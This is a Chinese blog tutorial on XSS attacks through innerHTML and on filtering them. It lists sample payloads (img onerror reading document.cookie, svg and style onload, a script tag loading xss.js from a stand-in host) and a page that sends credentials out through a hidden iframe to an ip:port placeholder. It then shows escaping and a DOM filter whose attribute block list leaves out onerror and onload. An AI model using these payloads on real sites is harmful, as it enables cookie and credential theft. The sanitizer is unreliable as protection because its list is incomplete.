前端xss攻击——规避innerHtml过滤标签节点及属性

最新推荐文章于 2024-06-18 11:06:34 发布
置顶 最新推荐文章于 2024-06-18 11:06:34 发布
阅读量1.7w 收藏 25
点赞数 39
分类专栏: web站点 文章标签: 前端 xss javascript web安全
yma16
本文链接:https://blog.csdn.net/qq_38870145/article/details/137212787
版权

文章目录


yma16-logo

⭐前言

大家好,我是yma16,本文分享xss攻击——规避innerHtml过滤script等动态js节点。

xss攻击
XSS(Cross-Site Scripting)攻击是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本代码注入到网页中,当用户通过浏览器访问这个网页时,这些恶意代码就会被执行,从而使攻击者能够窃取用户的敏感信息,如登录凭据、个人信息等。

XSS攻击一般可以分为三种类型:

  1. 存储型XSS:攻击者将恶意脚本代码存储到目标网站的数据库中,当用户访问含有恶意代码的页面时,代码会从数据库中被提取并执行。
  2. 反射型XSS:攻击者构造一个含有恶意代码的URL链接,当用户点击这个链接时,恶意代码会被注入到响应页面的参数中并执行。
  3. DOM型XSS:攻击者通过修改和篡改页面的DOM结构来实现攻击,一般通过修改URL参数或表单数据来触发。

为了防止XSS攻击,开发者可以采取以下几种措施:

  • 输入验证和过滤:对用户输入的数据进行验证和过滤,只允许合法的输入。
  • 转义输出:在向用户输出数据时,对特殊字符进行转义处理,防止恶意代码被执行。
  • 设置HttpOnly标志:在设置Cookie时,添加HttpOnly标志,使得Cookie只能通过HTTP协议传输,防止被恶意脚本窃取。
  • 使用内容安全策略(Content Security Policy,CSP):CSP可以帮助开发者限制网页中可以执行的脚本来源,从而有效防止XSS攻击。

总之,XSS攻击是一种常见而危险的漏洞,开发者和用户都需要注意防范和注意保护个人信息的安全。

⭐规避innerHtml

inner的危险
使用innerHtml属性可以直接操作和修改HTML内容,但是也存在一定的危险性。以下是一些内涵Html属性的潜在风险:

  1. 跨站脚本攻击(XSS):如果输入的内容没有经过适当的验证和过滤,恶意用户可以插入恶意脚本代码,从而实现跨站脚本攻击。这些恶意脚本可以用来窃取用户的个人信息、篡改网页内容或发送恶意行为。

  2. 不安全的内容插入:使用innerHtml属性可以直接插入内容,但如果不进行适当的验证和过滤,可能会导致插入不安全的内容,例如从不受信任的来源获取的脚本、链接或其他恶意代码。

  3. CSS注入:通过innerHtml属性,恶意用户可以插入恶意的CSS代码,从而导致网页的样式受到破坏,或者被重定向到其他网页。

  4. 内容失去结构:使用innerHtml属性可以直接修改HTML结构,但如果不小心操作,可能导致内容失去原有的结构和语义,影响网页的可访问性和可维护性。

为了减少这些风险,开发者应该始终对输入的内容进行适当的验证、过滤和转义,以防止XSS攻击和其他安全问题。建议使用安全的API或框架来处理HTML内容,例如使用textContent属性来修改文本内容,或使用DOM操作方法来修改元素的属性和子元素。

💖在iframe中使用innerHtml的场景

iframe直接渲染html字符串

 // innerHtml渲染iframe
 const innerHtmlIframe = () => {
     const doc = document.getElementById('iframe-id').contentWindow.document;
     const iframeHtmlDom = doc.getElementsByTagName('html')[0];
     iframeHtmlDom.innerHTML = getHtml()
 }

某个document直接使用innerHtml

documnet.getElementById('test').innerHTML = '<a href="javascript:alert('恶意脚本');">恶意脚本</a>'

恶意代码运行的效果:点击链接运行js弹出一个弹框
xss-html
恶意的输入内容
style标签

<style οnlοad=alert(1)></style>

svg标签

<svg onload="alert(0)">
<svg οnlοad="alert(0)"//

标签

<img  src=1  οnerrοr=alert("hack")>
<img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

video标签

<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

script标签

<script>alert("hack")</script>   #弹出hack
<script>alert(/hack/)</script>   #弹出hack
<script>alert(0)</script>        #弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script>      #弹出cookie
<script src=http://xxx.com/xss.js></script>  #引用外部的xss

利用JS将用户信息发送给后台

<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title></title>
    <script src="https://cdn.staticfile.org/jquery/1.10.2/jquery.min.js"></script>
    <script>
        $(function(){
            //我们现在假如 user和pass是我们利用js获得的用户的用户名和密码
            user="admin";
            pass="root";
            url="http://ip:port/?user="+user+"&pass="+pass;
            var frame=$("<iframe>");
            frame.attr("src",url);
            frame.attr("style","display:none");
            $("#body").append(frame);      //添加一个iframe框架,并设置不显示。这个框架会偷偷访问该链接。
        });
</script>
</head>
<body id="body">
    <h3>hello,word!</h3>
</body>
</html>

💖标签转义

通过将特殊字符转义为实体编码

HTML常用的转义字符&quot; &amp; &lt; &gt; &nbsp;

参考转义文档:https://tool.oschina.net/commons?type=2

字符十进制转义字符
"&#34; &quot;
&&#38;&amp;
<&#60;&lt;
>&#62;&gt;
不断开空格(non-breaking space)&#160;&nbsp;

普通的转义处理

// HTML转义
let userInput = '<script>alert("XSS Attack");</script>';
let escapedHtml = document.createElement('div');
escapedHtml.textContent = userInput;
console.log(escapedHtml.innerHTML);
// 输出:&lt;script&gt;alert("XSS Attack");&lt;/script&gt;

HTML转义,使用textContent属性创建一个新的DOM元素,并将用户输入设置为文本内容,通过访问innerHTML属性获取HTML转义后的输出

💖url 进行encode

urlEncode处理跳转的属性href和src

// URL编码
let url = 'https://www.example.com/?param=' + encodeURIComponent('<script>alert("XSS Attack");</script>');
console.log(url);
// 输出:https://www.example.com/?param=%3Cscript%3Ealert(%22XSS%20Attack%22);%3C/script%3E

💖手动过滤内容+转义

使用枚举把恶意标签和脚本通过内容处理屏蔽,再使用普通的转义

32个可以触发xss的属性

[
    "onmouseenter",
    "onmouseleave",
    "onmousewheel",
    "onscroll",
    "onfocusin",
    "onfocusout",
    "onstart",
    "onbeforecopy",
    "onbeforecut",
    "onbeforeeditfocus",
    "onbeforepaste",
    "oncontextmenu",
    "oncopy",
    "oncut",
    "ondrag",
    "ondragend",
    "ondragenter",
    "ondragleave",
    "ondragover",
    "ondragstart",
    "ondrop",
    "onlosecapture",
    "onpaste",
    "onselectstart",
    "onhelp",
    "onEnd",
    "onBegin",
    "onactivate",
    "onfilterchange",
    "onbeforeactivate",
    "onbeforedeactivate",
    "ondeactivate"
]

手动处理dom节点之后再返回dom

const xssTagArr = [
    "onmouseenter",
    "onmouseleave",
    "onmousewheel",
    "onscroll",
    "onfocusin",
    "onfocusout",
    "onstart",
    "onbeforecopy",
    "onbeforecut",
    "onbeforeeditfocus",
    "onbeforepaste",
    "oncontextmenu",
    "oncopy",
    "oncut",
    "ondrag",
    "ondragend",
    "ondragenter",
    "ondragleave",
    "ondragover",
    "ondragstart",
    "ondrop",
    "onlosecapture",
    "onpaste",
    "onselectstart",
    "onhelp",
    "onEnd",
    "onBegin",
    "onactivate",
    "onfilterchange",
    "onbeforeactivate",
    "onbeforedeactivate",
    "ondeactivate"
]

// 获取html doc
const getHtmlDocByString = (htmlString) => {
    const parser = new DOMParser();
    const doc = parser.parseFromString(htmlString, 'text/html');
    return doc
}

// 过滤 head 
function filterHeadDomAction(node) {
    const name = node.nodeName
    console.log('name', name)
    if (name.toLocaleLowerCase() === 'script') {
        // 过滤script 标签
        console.log('script', name)
        // 删除
        node.remove()
    }

    // 对于链接使用 urlEncode
    // 对于链接使用 urlEncode
    ['href', 'src'].forEach(attr => {
        const arrtVal = node.getAttribute(attr)
        if (arrtVal) {
            node.setAttribute(attr, encodeURIComponent(arrtVal))
        }
    })

    // 移除异常属性
    xssTagArr.forEach(attr => {
        if (node && node.getAttribute(attr)) {
            node.removeAttribute(attr)
        }

    })

    // 遍历当前节点的子节点
    for (let i = 0; i < node.childNodes.length; i++) {
        const child = node.childNodes[i];
        // 递归遍历子节点
        if (child.nodeType === 1) {
            filterHeadDomAction(child)
        }
    }
    return node
}

//   过滤 body dom
function filterBodyDomAction(node) {
    const name = node.nodeName
    console.log('name', name)
    if (name.toLocaleLowerCase() === 'script') {
        // 过滤script 标签
        console.log('script', name)
        // 删除 script
        node.remove()
    }
    // 对于链接使用 urlEncode
    ['href', 'src'].forEach(attr => {
        const arrtVal = node.getAttribute(attr)
        if (arrtVal) {
            node.setAttribute(attr, encodeURIComponent(arrtVal))
        }
    })

    // 移除异常属性
    xssTagArr.forEach(attr => {
        if (node && node.getAttribute(attr)) {
            node.removeAttribute(attr)
        }

    })
    // 遍历当前节点的子节点
    for (let i = 0; i < node.childNodes.length; i++) {
        const child = node.childNodes[i];
        // 递归遍历子节点
        if (child.nodeType === 1) {
            filterBodyDomAction(child)
        }
    }
    return node
}



// 过滤html
const filterHtmlDoc = () => {
    const htmlVal = getHtml()

    const htmlDom = getHtmlDocByString(htmlVal)

    const filterBodyDom = filterBodyDomAction(htmlDom.body)
    const filterHeadDom = filterHeadDomAction(htmlDom.head)
    // dom节点替换  html ->head\body
    const doc = document.getElementById('iframe-id').contentWindow.document;

    const iframeHtmlDom = doc.getElementsByTagName('html')[0];
    // 替换dom
    iframeHtmlDom.replaceChild(filterHeadDom, iframeHtmlDom.getElementsByTagName('head')[0]);
    iframeHtmlDom.replaceChild(filterBodyDom, iframeHtmlDom.getElementsByTagName('body')[0]);

}

⭐inscode代码块演示

img
inscode代码如下

运行测试截图如下
xss-test

⭐结束

本文分享到这结束,如有错误或者不足之处欢迎指出!
earth

👍 点赞,是我创作的动力!
⭐️ 收藏,是我努力的方向!
✏️ 评论,是我进步的财富!
💖 最后,感谢你的阅读!

yma16
关注
  • 39
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 9
    评论
专栏目录
解决v-html指令潜在的xss攻击
lingxiaoxi_ling的博客
04-29 1万+
我们首先来看一个例子 运行之后由于src地址对应的资源找不到,会触发img标签的error事件,最终alert弹框。这便是一个最简单的xss攻击。 html指令的运行原理 v-html指令源码 // /vue/src/platforms/web/compiler/directives/html.js export default function html (el: ASTElement, di...
预防xss攻击过滤标签.js
04-01
预防xss攻击过滤标签.js
浅淡XSS跨站脚本攻击的防御方法
18年3月萌新白帽子
11-13 1万+
一、HttpOnly属性 为Cookie中的关键值设置httponly属性,众所周知,大部分XSS(跨站脚本攻击)的目的都是通过浏览器的同源策略,来获取用户Cookie,从而冒充用户登陆系统的。 如果为Cookie中用于用户认证的关键值设置httponly属性,浏览器将会禁止js通过同源策略访问cookie中设有httponly属性的信息,因此以劫...
Web安全基础学习:XSS跨站脚本漏洞之反射型XSS
最新发布
qq_51862722的博客
06-18 685
反射型XSS漏洞:攻击者发送给被攻击者一个邮件信息或者链接,当被攻击者点击并访问该链接时,此时就会向攻击者的目标服务器发起请求,此时根据请求返回相关的script代码,当浏览器解析这些script代码时,此时代码就会在浏览器执行,造成用户被攻击。攻击者针对若该参数未经处理直接拼接到JS中,则会直接执行弹窗代码。若将弹窗代码修改为恶意攻击代码,则会产生严重安全问题。盗取用户登录凭证(Cookie)、劫持用户会话、修改网页内容、网页挂马、恶意重定向、Dos攻击、钓鱼攻击、XSS蠕虫攻击等。
InnerHTML属性XSS利用
士心的博客
07-26 1772
0x0前言 之前一直对于反射型和DOM型XSS的区别分不清楚,没有好好深入理解,短浅的将DOM型XSS归为反射型的一种。最近因为要写一下靶场,所以特别深入了一下,发现他们最大的区别就是反射型是经过后端的,它经过后端处理后返回至前端,而DOM型则是通过JS直接操作DOM树来完成的,它不经过后端。正是因为不经过后端,而大部分的过滤操作都是在后端进行,前端往往被忽略,所以在大型厂商它存在的概率甚至比反射型还大。 例如某知名安全平台就出现过一个DOM型xss漏洞: “灯下黑”挖出国内知名安全平台某BUF的xss漏洞
innerHTMLXSS攻击
hhhh
04-30 4006
HTML5为所有元素提供了一个innerHTML属性,既能获取对象的内容又能向对象插入内容 属性值:HTML标签/文本 浏览器会将属性值解析为相应的DOM树 HTML解析器在浏览器中是底层代码比JavaScript方法快很多,同时意味着替换元素上的关联事件处理程序和JavaScript对象需要手动删除。 插入script和style元素的时候需要看具体的浏览器 XSS攻击 outerHTML ==innerHTML定义的DOM树+自身元素 innerText与outerHTML: innerText:后代
Web的基本漏洞--XSS漏洞
尽欢的博客
05-31 3350
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
网络安全学习笔记——XSS漏洞
just do it
11-22 1624
XSS(Cross-site scripting)跨站脚本攻击。(缩写为CSS,但会与层叠样式表 Cascading Style Sheets 混淆,故称XSS)通常发生在客户端,可被用于进行窃取隐私,钓鱼欺骗,窃取密码,传播恶意代码等。
前端安全漏洞之 XSS
杏子
07-09 2112
前端安全漏洞之 XSS一、概念二、特点三、示例四、防范 一、概念 XSS(Cross Site Scripting)是跨站脚本攻击,即在他人站点嵌入带有攻击性的脚本。原本缩写应该是CSS,但为了与 Cascading Style Sheet(层叠样式表,也就是前端中样式CSS)区分,就将其缩写为 XSS。 二、特点 XSS 攻击的源头是服务端过于信任客户端提交的数据; XSS 攻击是通过网站暴露...
基于Java的高级XSS攻击过滤器设计源码
04-08
高级XSS攻击过滤器 - 基于Java开发,包含33个文件,如XML、JAVA、GITIGNORE、NAME和IML等。该系统实现了一个有选择地过滤XSS攻击代码的功能,通过Java技术实现界面交互和功能模块,为用户提供了一个高效、安全XSS...
前端安全XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
前端安全系列:如何防止XSS攻击
01-27
前端安全领域,XSS(Cross-site scripting)攻击是最常见且危险的一种,它允许攻击者在用户浏览器上执行恶意脚本。XSS攻击通常通过注入恶意代码到网页中,利用了浏览器信任并执行来自服务器的任何HTML和JavaScript...
JSP Struts过滤xss攻击的解决办法
10-19
**JSP Struts过滤XSS攻击的解决办法** 在Web应用程序开发中,XSS(Cross Site Scripting)攻击是一种常见的安全威胁,它允许攻击者在用户的浏览器中注入恶意脚本,从而盗取用户数据或执行其他恶意操作。JSP与Struts...
XSS漏洞(全网最详细)
qq_61553520的博客
04-20 3471
反射型XSS:主要体现在URL里,但是一次性的存储型XSS:主要关注网站一些类似留言框,评论的地方DOM型XSS:与其说是XSS更像是逻辑漏洞,主要需要对前端代码进行审计,需要懂js代码!!
关于XSS过滤
lanisa的专栏
10-30 1579
XSS攻击绕过过滤方法大全(约100种) XSS攻击绕过过滤方法大全(约100种) - 付杰博客 解决办法: 1.增加前端过滤 可参考:https://www.cnblogs.com/caizhenbo/p/6836390.html 【前端安全JavaScriptXSS攻击 xss前端过滤工具:https://cdn.bootcdn.net/ajax/libs/js-xss/0.3.3/xss.min.js 使用方法:https://www.cnblogs.com/fyjz/p/11905.
关于xss攻击解决方案
susanliy的博客
01-11 2880
如何防止XSS攻击?1.innerHTMLxss攻击2.DOMParser().parseFromString()–性能最差,会受到xss攻击3.Range.createContextualFragment()–会执行内联的script js代码,这个方法尽量不要使用,不安全4.insertAdjacentHTML()–会受到xss攻击5.createContextualFragment ()–安全性能差,会受到xss攻击
XSS漏洞注入,分类,防御方法
Y22Lee的博客
04-06 3635
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,仅次于SQL注入。XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。由此可知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。
XSS各种过滤手段,如何绕过写payload-学习笔记
ZhangAweio的博客
04-12 1038
XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,意思就是说可以任意执行js代码,包括js的而已代码。
XSS漏洞及其原理(详解)
热门推荐
刘桂香263的博客
07-29 1万+
XSS被称为跨站脚本攻击(CrossSiteScripting),由于和层叠样式表(CascadingStyleSheets,CSS)重名,改为XSS。主要基于JavaScript语言进行恶意攻击,因为js非常灵活操作html、css、浏览器。
innerHTML xss攻击预防
06-10
为了防止innerHTML中的XSS攻击,你可以采取以下措施: 1. 使用textContent代替innerHTML,这样可以将所有的HTML标签都转换为文本内容,从而避免了XSS攻击。 2. 如果必须使用innerHTML,请过滤掉所有的HTML标签和特殊字符,只允许一些安全标签属性,例如p、br、a、img等标签。 3. 对于输入的内容,进行输入验证和过滤,防止恶意的脚本注入。 4. 使用CSP(Content Security Policy)来限制页面的资源加载和脚本执行。 5. 对于用户输入的内容,可以使用一些现成的XSS过滤器库,例如DOMPurify、XSS.js等。 这些措施可以帮助你有效地预防innerHTML中的XSS攻击
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yma16

感谢支持!共勉!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值